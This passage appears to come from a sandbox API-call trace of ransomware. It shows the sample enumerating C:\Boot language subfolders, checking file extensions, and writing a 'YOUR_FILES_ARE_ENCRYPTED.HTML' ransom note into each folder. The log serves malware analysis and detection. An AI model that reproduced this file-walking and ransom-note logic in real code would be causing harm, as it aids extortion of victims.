lpString2="\\\\?\\C:\\Boot\\fr-FR" | out: lpString1="\\\\?\\C:\\Boot\\fr-FR") returned="\\\\?\\C:\\Boot\\fr-FR" [0155.098] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\fr-FR", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\fr-FR\\*") returned="\\\\?\\C:\\Boot\\fr-FR\\*" [0155.098] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fr-FR\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f8b1c0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.098] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f8b1c0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.098] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.098] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 33 [0155.098] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.098] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.098] lstrlenW (lpString=".mui") returned 4 [0155.098] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.099] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.099] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.099] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.099] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\fr-fr\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.099] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.101] CloseHandle (hObject=0x4a4) returned 1 [0155.105] GetProcessHeap () returned 0x270000 [0155.106] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.106] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f8b1c0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0155.106] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU") returned 17 [0155.106] GetProcessHeap () returned 0x270000 [0155.106] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.106] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\hu-HU" | out: lpString1="\\\\?\\C:\\Boot\\hu-HU") returned="\\\\?\\C:\\Boot\\hu-HU" [0155.106] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\hu-HU", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\hu-HU\\*") returned="\\\\?\\C:\\Boot\\hu-HU\\*" [0155.106] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\hu-HU\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f8b1c0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.108] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f8b1c0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.108] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.108] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 33 [0155.108] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.108] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.108] lstrlenW (lpString=".mui") returned 4 [0155.108] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.108] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.108] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.108] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.108] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\hu-hu\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.108] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.110] CloseHandle (hObject=0x4a4) returned 1 [0155.111] GetProcessHeap () returned 0x270000 [0155.112] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.112] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f8b1c0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0155.112] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\it-IT") returned 17 [0155.112] GetProcessHeap () returned 0x270000 [0155.112] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.112] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\it-IT" | out: lpString1="\\\\?\\C:\\Boot\\it-IT") returned="\\\\?\\C:\\Boot\\it-IT" [0155.112] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\it-IT", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\it-IT\\*") returned="\\\\?\\C:\\Boot\\it-IT\\*" [0155.112] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\it-IT\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f8b1c0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.112] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44f8b1c0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.112] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.112] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 33 [0155.112] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.112] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.112] lstrlenW (lpString=".mui") returned 4 [0155.113] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.113] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44f8b1c0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.113] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.113] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.113] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\it-it\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.113] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.115] CloseHandle (hObject=0x4a4) returned 1 [0155.115] GetProcessHeap () returned 0x270000 [0155.117] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.117] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fb1320, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44fb1320, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0155.117] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP") returned 17 [0155.117] GetProcessHeap () returned 0x270000 [0155.117] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.117] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\ja-JP" | out: lpString1="\\\\?\\C:\\Boot\\ja-JP") returned="\\\\?\\C:\\Boot\\ja-JP" [0155.117] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\ja-JP", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\ja-JP\\*") returned="\\\\?\\C:\\Boot\\ja-JP\\*" [0155.117] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ja-JP\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fb1320, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44fb1320, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.147] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fb1320, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44fb1320, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.147] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fb1320, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.147] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 33 [0155.147] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.147] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.147] lstrlenW (lpString=".mui") returned 4 [0155.147] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.147] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec495de0, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fb1320, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.147] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.147] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.147] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\ja-jp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.147] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.149] CloseHandle (hObject=0x4a4) returned 1 [0155.150] GetProcessHeap () returned 0x270000 [0155.151] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.151] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fb1320, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44fb1320, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0155.151] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR") returned 17 [0155.151] GetProcessHeap () returned 0x270000 [0155.151] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.151] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\Boot\\ko-KR" | out: lpString1="\\\\?\\C:\\Boot\\ko-KR") returned="\\\\?\\C:\\Boot\\ko-KR" [0155.151] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\ko-KR", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\ko-KR\\*") returned="\\\\?\\C:\\Boot\\ko-KR\\*" [0155.151] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ko-KR\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fb1320, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44fb1320, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.152] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fb1320, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44fb1320, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.152] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fb1320, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.152] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 33 [0155.152] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.152] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.152] lstrlenW (lpString=".mui") returned 4 [0155.152] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.152] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fb1320, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.152] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.152] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.152] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\ko-kr\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.152] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.154] CloseHandle (hObject=0x4a4) returned 1 [0155.155] GetProcessHeap () returned 0x270000 [0155.156] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.156] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fb1320, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xf8aff852, ftLastWriteTime.dwHighDateTime=0x1cb88f9, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0155.156] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\memtest.exe") returned 23 [0155.156] lstrcmpW (lpString1="memtest.exe", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.156] PathFindExtensionW (pszPath="memtest.exe") returned=".exe" [0155.156] lstrlenW (lpString=".exe") returned 4 [0155.156] PathFindExtensionW (pszPath="memtest.exe") returned=".exe" [0155.156] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4bbf40, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x44fd7480, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x44fd7480, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0155.156] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO") returned 17 [0155.156] GetProcessHeap () returned 0x270000 [0155.156] 